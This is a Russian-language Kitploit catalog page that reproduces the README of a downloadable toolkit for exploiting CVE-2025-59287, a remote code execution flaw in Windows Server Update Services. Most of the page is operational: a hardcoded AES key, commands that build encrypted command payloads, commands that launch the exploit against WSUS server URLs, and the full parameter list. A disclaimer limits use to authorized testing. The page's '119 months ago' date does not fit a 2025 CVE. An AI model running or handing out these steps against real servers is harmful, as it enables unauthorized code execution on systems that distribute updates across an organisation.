Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-59287 — Набор инструментов для эксплуатации CVE-2025-59287 RCE в WSUS. Включает шифрование полезной нагрузки AES и модуль эксплуатации для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/adel-hx0d/cve-2025-59287
Инструменты шифрования/дешифрованияГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubadel-hx0d/cve-2025-59287

cve-2025-59287

Набор инструментов для эксплуатации CVE-2025-59287 RCE в WSUS. Включает шифрование полезной нагрузки AES и модуль эксплуатации для авторизованного тестирования на проникновение.

Репозиторий
119 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59287 - Инструментарий эксплуатации WSUS

от adel-h4x0a

⚠️ Только для образовательных и авторизованных целей тестирования ⚠️

Обзор

Этот инструментарий демонстрирует эксплуатацию CVE-2025-59287, уязвимости удаленного выполнения кода в службе обновления Windows Server (WSUS).

Компоненты

  1. Модуль шифрования (cve-2025-59287-encr.py)

· Шифрование полезной нагрузки AES для связи WSUS · Поддержка как устаревшего, так и безопасного режимов шифрования · Генерация пользовательской полезной нагрузки

  1. Модуль эксплуатации (cve-2025-59287-exp.py)

· Полная цепочка эксплуатации CVE-2025-59287 · Надежная обработка ошибок и логика повторных попыток · Поддержка пользовательской полезной нагрузки

Структура

root@kitploit:~
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py      # Encryption module
├── 📄 cve-2025-59287-exp.py       # Exploitation module
├── 📄 requirements.txt            # Dependencies
└── 📄 README.md                   # This file

Использование

Предварительные требования

root@kitploit:~
pip install -r requirements.txt

Шифрование

root@kitploit:~
# Базовое шифрование
python cve-2025-59287-encr.py --command "calc" --mode legacy

# Шифрование с пользовательским ключом
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"

# Сохранить вывод в файл
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt

Эксплуатация

root@kitploit:~
# Базовая эксплуатация
python cve-2025-59287-exp.py http://wsus-server:8530

# С пользовательской полезной нагрузкой
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt

# С расширенными настройками
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5

Параметры

Модуль шифрования (cve-2025-59287-encr.py)

· --key: Ключ AES в шестнадцатеричном формате (опционально) · --command: Команда для выполнения (по умолчанию: calc) · --mode: Режим шифрования [legacy, secure] (по умолчанию: legacy) · --output: Выходной файл для сохранения полезной нагрузки (опционально)

Модуль эксплуатации (cve-2025-59287-exp.py)

· target: URL сервера WSUS (обязательно) · --payload: Файл пользовательской полезной нагрузки в base64 (опционально) · --timeout: Таймаут запроса в секундах (по умолчанию: 30) · --retries: Количество попыток повторения (по умолчанию: 3) · --no-banner: Подавить отображение баннера (опционально)

Полный пример

root@kitploit:~
# Сгенерировать пользовательскую полезную нагрузку
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt

# Выполнить эксплуатацию
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt

Юридическое заявление

❗ Важное предупреждение:

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным.

Этот инструмент следует использовать только в:

· Тестовых средах, которые вам принадлежат · Системах, на тестирование которых вы получили письменное разрешение · Образовательных и академических целях

Разработчик не несет ответственности за любое незаконное или несанкционированное использование этого инструмента.

Лицензия

Этот проект лицензирован в соответствии с лицензией MIT.

Обновления

· v1.0: Первоначальный выпуск с полной поддержкой эксплуатации · v1.1: Улучшенная обработка ошибок и улучшения журналирования

Участие

Приветствуются сообщения об ошибках и запросы на слияние для улучшения инструмента в рамках ответственного и этичного использования.


Примечание: Всегда получайте письменное разрешение перед тестированием любой системы. Осведомленность в вопросах безопасности начинается с ответственности. 🔒

Скачать инструмент